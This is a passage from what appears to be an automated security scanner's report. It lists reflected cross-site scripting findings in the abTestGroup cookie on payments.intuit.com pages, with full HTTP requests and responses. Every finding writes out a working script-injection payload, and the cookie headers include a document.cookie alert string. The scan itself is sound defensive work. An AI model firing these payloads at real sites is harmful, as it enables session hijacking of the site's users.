Set-Cookie: INTUIT_SESSIONID=bkNCK07OCYlhWgd9BRZ2Jg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:18 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FCE130A0805192AA117E35B0EC2E7
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 128365

...[SNIP]...
<br />
       A/B Test Group: T16b8e7d<script>alert(1)</script>1a9cb1ed9ff<br />
...[SNIP]...

1.69. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d50dd"><script>alert(1)</script>0da146df87f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16d50dd"><script>alert(1)</script>0da146df87f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:01 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=N5kpkn1f65UWezK4PWrIhQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:02 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AF8AF0A0805192AA117E3D0164F8A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161404

...[SNIP]...
<input id="testGroup" value="T16d50dd"><script>alert(1)</script>0da146df87f" type="hidden" />
...[SNIP]...

1.70. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 5bab0<script>alert(1)</script>ddd1b3cb4d0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T165bab0<script>alert(1)</script>ddd1b3cb4d0;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=1powooXFBn-h-hwDYnv+xw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CD1C50A0805192AA117E35710C64D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161391


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T165bab0<script>alert(1)</script>ddd1b3cb4d0<br />
...[SNIP]...

1.71. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 985ed"><script>alert(1)</script>23bad0dfc93 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16985ed"><script>alert(1)</script>23bad0dfc93;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:48 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=D7wXCvj0JH7i3uKdbQ-emg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:49 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AC6930A0805192AA117E366D30E15
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93343


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16985ed"><script>alert(1)</script>23bad0dfc93" type="hidden" />
...[SNIP]...

1.72. http://payments.intuit.com/apply-now/contact-me.jsp [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload dbc30<script>alert(1)</script>a86e2fa9ef0 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16dbc30<script>alert(1)</script>a86e2fa9ef0;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:10 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=oxD02Vt1dG7QQnxJWJEH5g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:11 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C08810A0805192AA117E374365C21
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93328


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T16dbc30<script>alert(1)</script>a86e2fa9ef0<br />
...[SNIP]...

1.73. http://payments.intuit.com/products/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload 20d8b<script>alert(1)</script>07ae2d24ce9 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T1620d8b<script>alert(1)</script>07ae2d24ce9;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=nQy7xY0qaIGSmjWmG8-mmg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95AA5C10A0805192AA117E3A4E9C6F1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90419


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<br />
       A/B Test Group: T1620d8b<script>alert(1)</script>07ae2d24ce9<br />
...[SNIP]...

1.74. http://payments.intuit.com/products/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 880a1"><script>alert(1)</script>9e7870cf12f was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16880a1"><script>alert(1)</script>9e7870cf12f;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:57:27 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=mIzaMcgmXkKXC6HMobj9Sw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:34:28 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9598B0D0A0805192AA117E332415D03
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90433


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T16880a1"><script>alert(1)</script>9e7870cf12f" type="hidden" />
...[SNIP]...

1.75. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e4c4"><script>alert(1)</script>961eb3d32b2 was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T161e4c4"><script>alert(1)</script>961eb3d32b2;

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:58:30 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=q5EsYaR2RRf6wEGsGNei3A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:35:31 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95A83170A0805192AA117E3BA132B36
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92671


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<input id="testGroup" value="T161e4c4"><script>alert(1)</script>961eb3d32b2" type="hidden" />
...[SNIP]...

1.76. http://payments.intuit.com/products/basic-payment-solutions/ [abTestGroup cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the abTestGroup cookie is copied into the HTML document as plain text between tags. The payload f2d55<script>alert(1)</script>c704fa6a9ea was submitted in the abTestGroup cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

